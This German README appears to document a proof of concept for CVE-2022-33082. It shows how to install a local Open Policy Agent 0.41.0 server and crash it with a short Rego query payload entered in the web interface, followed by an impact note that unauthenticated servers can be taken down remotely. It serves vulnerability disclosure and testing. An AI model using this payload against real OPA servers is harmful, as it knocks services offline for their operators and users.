CVE 2022-33082 Exploit
HAFTUNGSAUSSCHLUSS
Dieser Code wird für ETHISCHE Zwecke bereitgestellt – zum Verständnis der Schwachstelle und zum Testen eigener Systeme oder AUTORISIERTER Systeme. Durch die Nutzung erklären Sie sich damit einverstanden, ethisch zu handeln, und ich übernehme keine Haftung, falls Sie nicht ethisch handeln.
Dieser Exploit funktioniert mit Open Policy Agent (OPA)-Versionen 0.41.0 und niedriger. Installieren Sie eine OPA-Instanz unter Linux, um mit folgendem Befehl zu testen:
curl -L -o opa https://openpolicyagent.org/downloads/v0.41.0/opa_linux_amd64_static
chmod +x opa
./opa run --server
Navigieren Sie dann in Ihrem Webbrowser zu localhost:8181. Geben Sie Folgendes in die entsprechenden Felder ein:
Abfragefeld (Go-Code):
p := [input() | input := 1]
{ "input":"put this in the input (json) field!" }
Die Website stürzt dann ab und das Terminal, auf dem der Server läuft, meldet einen Kernel-Panic.
Auswirkungen
Jeder mit Webzugriff auf einen OPA-Server der Version 0.41.0 oder niedriger kann den Server vollständig zum Absturz bringen. Dieser Server ist standardmäßig nicht passwortgeschützt.